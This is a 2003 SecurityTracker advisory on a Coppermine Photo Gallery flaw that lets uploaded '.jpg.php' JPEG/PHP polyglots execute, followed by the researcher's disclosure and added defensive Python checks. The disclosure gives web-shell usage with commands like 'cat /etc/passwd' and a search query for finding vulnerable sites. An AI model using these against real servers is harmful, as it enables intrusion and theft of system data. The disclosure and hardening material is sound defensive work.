SecurityTracker
Archives
Category:   Application (Multimedia)  >   Coppermine Photo Gallery
Vendors:   DEMAR, Gregory
Coppermine Photo Gallery File Extension Validation Flaw Lets Remote Users Upload and Execute PHP Code
SecurityTracker Alert ID:  1006508
SecurityTracker URL:  http://securitytracker.com/id/1006508
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 7 2003
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.0 RC3 and 1.0 RC1
Description:   A vulnerability was reported in Coppermine Photo Gallery. A remote user can upload PHP code to the server and execute it.

It is reported that the upload routine checks the file extension so that only files with a valid JPEG extension are accepted. However, the check is flawed and accepts a file name ending in ".jpg.php", so a remote user with image upload privileges (which in many configurations includes anonymous users) can upload such a file. Because the name ends in ".php", a web server configured to run PHP by extension hands the file to the PHP interpreter instead of serving it as an image.

Coppermine also rejects uploads that are not valid JPEG files, but a single file can be both a valid JPEG image and a valid PHP script (for example, with the PHP code placed in a JPEG comment segment, which image decoders ignore). A remote user can create such a file, upload it, and then request it through the web server to execute the embedded code with the privileges of the web server's PHP process.

A demonstration exploit file is provided in the Source Message.
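The following is an added illustration of the flaw class described above, not Coppermine's own code (the advisory does not reproduce the original routine). It is written in Python rather than PHP so it runs stand-alone: 'flawed_is_image' is a hypothetical reconstruction of a check that looks for an image extension anywhere in the name, 'hardened_is_image' requires every extension in the name to be an allowed image type (which also rejects "x.php.jpg", a name some Apache configurations would still run as PHP), and 'stored_name' discards the user-supplied name entirely.

```python
"""Extension-check bypass of the kind the advisory describes.

Added example, not Coppermine's code: the flawed routine is a
hypothetical reconstruction of the bug class, the hardened one shows
what an upload handler should do instead.
"""
import os
import re
import secrets

ALLOWED = {"jpg", "jpeg", "gif", "png"}


def _basename(filename: str) -> str:
    """Strip any directory part the client may have sent (either separator)."""
    return os.path.basename(filename.replace("\\", "/"))


def flawed_is_image(filename: str) -> bool:
    """Hypothetical buggy check: passes any name that *contains* an image
    extension, so 'shell.jpg.php' is accepted."""
    return re.search(r"\.(jpe?g|gif|png)", filename, re.IGNORECASE) is not None


def real_extension(filename: str) -> str:
    """The extension a web server normally acts on is the part after the
    LAST dot; '' if there is none."""
    _, dot, ext = _basename(filename).rpartition(".")
    return ext.lower() if dot else ""


def hardened_is_image(filename: str) -> bool:
    """Every extension in the name must be an allowed image type.

    Rejects 'x.jpg.php' (last extension is php) and also 'x.php.jpg'
    (Apache's multiple-extension handling can still run that as PHP)."""
    parts = _basename(filename).split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(p.lower() in ALLOWED for p in parts[1:])


def stored_name(filename: str) -> str:
    """Never keep the user's name on disk: store under a random name with
    exactly one validated extension, so the server hands it to the image
    handler and nothing else."""
    if not hardened_is_image(filename):
        raise ValueError("not an allowed image type")
    return f"{secrets.token_hex(8)}.{real_extension(filename)}"


if __name__ == "__main__":
    for name in ("holiday.JPG", "Copperminer.jpg.php", "x.php.jpg", "notes"):
        print(f"{name:22} flawed={flawed_is_image(name)!s:5} "
              f"hardened={hardened_is_image(name)}")
```

The name check is only half of the fix; the content check (a file that is a valid JPEG can still carry PHP) is a separate problem, covered in the source message below.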

Impact:   A remote user with image uploading privileges can upload arbitrary PHP code to the server and execute it with the privileges of the web server's PHP process.
Solution:   The vendor has released a fixed version (1.1 Beta 2), available at:

http://www.chezgreg.net/coppermine/mod.php?mod=downloads&op=viewdownload&cid=2

The vendor has also issued a patched version of 'db_input.php' for 1.0 versions.

Patch for users of version 1.0RC3:

http://chez.greg.free.fr/downloads/db_input_1.0RC3_patched.zip

Patch for users of version 1.0RC1:

http://chez.greg.free.fr/downloads/db_input_1.0RC1_patched.zip

Vendor URL:  www.chezgreg.net/coppermine/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Coppermine Photo Gallery remote compromise



---AFFECTED SOFTWARE---
From the website, http://www.chezgreg.net/coppermine/:

"Coppermine Photo Gallery is a picture gallery script. Users can upload
pictures with a web browser (thumbnails are created on the fly), add
comments, send e-cards and view statistics about the pictures. "
"The script uses PHP, a MySQL database and the GD library (version 1.x or
2.x) or ImageMagick to make the thumbnails. An install script makes the
installation very fast and easy."

The problem was found in Coppermine 1.0 RC3, the latest stable release. The
latest beta (1.1 beta 2) is not affected according to the author.

---PROBLEMS---
Coppermine allows the uploading of images onto a server by logged-in users
and in a lot of configurations even anonymous uploading. The upload script
has a buggy extension checking routine which allows the uploading of
".jpg.php" files. These files need to be valid jpg files or Coppermine
will delete them. It is trivial to create a file which is a valid jpg and
also a valid PHP script. Once uploaded, the PHP script can then be executed,
allowing access to the remote server under the privileges of the user PHP
is running under.

---EXPLOIT---
Attached is a working exploit, upload this onto a vulnerable server and
execute it like this:
/albums/userpics/Copperminer.jpg.php?[command]
Where command can be something like "id;uname%20-a" or "cat%20/etc/passwd"
Note 1: MSIE will display Copperminer.jpg.php as an image, but lynx will
display the output of the command you gave it.
Note 2: http://www.google.com/search?q=allinurl%3A+/upload.php?album=

---TIMELINE---
mar 31, 2003  - Issue discovered, working exploit written.
mar 31, 2003  - Author contacted, problem acknowledged by author.
apr 05, 2003  - Patches released through Coppermine website.
apr 07, 2003  - Information disclosed.

---PATCH---
Can be found at http://www.chezgreg.net/coppermine/

Kind regards,

Berend-Jan Wever
http://spoor12.edup.tudelft.nl

[Attachment: Copperminer.jpg.php]
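The post says it is trivial to build a file that is both a valid JPEG and a valid PHP script; the following added example (not the Copperminer.jpg.php attachment, whose contents are not reproduced here) shows one way to do that and the content check that catches it. The sample image is a constructed JPEG skeleton (SOI, JFIF APP0, EOI) with no pixel data, just enough structure to walk the marker segments; the payload is a harmless marker rather than a command runner. 'looks_like_jpeg' stands in for the shallow "is it a JPEG" test that the polyglot passes, and 'contains_php' is the additional check an upload handler needs.

```python
"""JPEG/PHP polyglot and the content check that detects it.

Added example, not the exploit from the original post. SAMPLE_JPEG is a
constructed marker skeleton, not a decodable picture.
"""
import re
import struct

SOI, EOI, COM, APP0, SOS = 0xD8, 0xD9, 0xFE, 0xE0, 0xDA
# Markers that carry no length field.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))

# Constructed sample: SOI + a JFIF APP0 segment + EOI.
JFIF_APP0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
SAMPLE_JPEG = (b"\xff\xd8"
               + b"\xff\xe0" + struct.pack(">H", len(JFIF_APP0) + 2) + JFIF_APP0
               + b"\xff\xd9")

PHP_PAYLOAD = b"<?php echo 'php executed'; ?>"  # harmless marker, not a shell


def inject_php_comment(jpeg: bytes, payload: bytes) -> bytes:
    """Insert payload as a COM segment right after SOI.

    The result is still a well-formed JPEG (decoders skip COM), but when a
    web server runs the file as PHP the interpreter echoes the bytes
    outside <?php ... ?> verbatim and executes what is inside."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    if len(payload) + 2 > 0xFFFF:
        raise ValueError("COM segment payload too large")
    com = b"\xff\xfe" + struct.pack(">H", len(payload) + 2) + payload
    return jpeg[:2] + com + jpeg[2:]


def looks_like_jpeg(data: bytes) -> bool:
    """Shallow validity test: SOI at the start, EOI at the end. A polyglot
    passes this, as it passes a real decoder."""
    return data[:2] == b"\xff\xd8" and data[-2:] == b"\xff\xd9"


def iter_segments(data: bytes):
    """Yield (marker, payload) for each header segment up to SOS or EOI."""
    pos = 2  # skip SOI
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker in STANDALONE:
            yield marker, b""
            if marker == EOI:
                return
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == SOS:
            return  # entropy-coded data follows; not segment-structured
        pos += 2 + length


PHP_TAG = re.compile(rb"<\?(php\b|=|\s)|<script\b", re.IGNORECASE)


def contains_php(data: bytes) -> bool:
    """Reject any upload carrying a PHP open tag anywhere in the file.

    Scan the whole byte string, not only COM/APPn segments: PHP would just
    as happily execute a tag hidden in scan data or after EOI."""
    return PHP_TAG.search(data) is not None


def php_comment_segments(data: bytes) -> list:
    """COM payloads holding a PHP open tag (useful when triaging uploads)."""
    return [p for m, p in iter_segments(data) if m == COM and PHP_TAG.search(p)]


if __name__ == "__main__":
    poly = inject_php_comment(SAMPLE_JPEG, PHP_PAYLOAD)
    print("valid-looking JPEG:", looks_like_jpeg(poly))
    print("segments:", [hex(m) for m, _ in iter_segments(poly)])
    print("contains PHP:", contains_php(poly))
```

The defensive lesson is that a magic-byte or decoder check on the upload does not establish that the file is harmless; the file must also be stored under a name and in a location the server will never execute, and re-encoding the image (which drops COM and APPn segments) removes the payload along with any other foreign data.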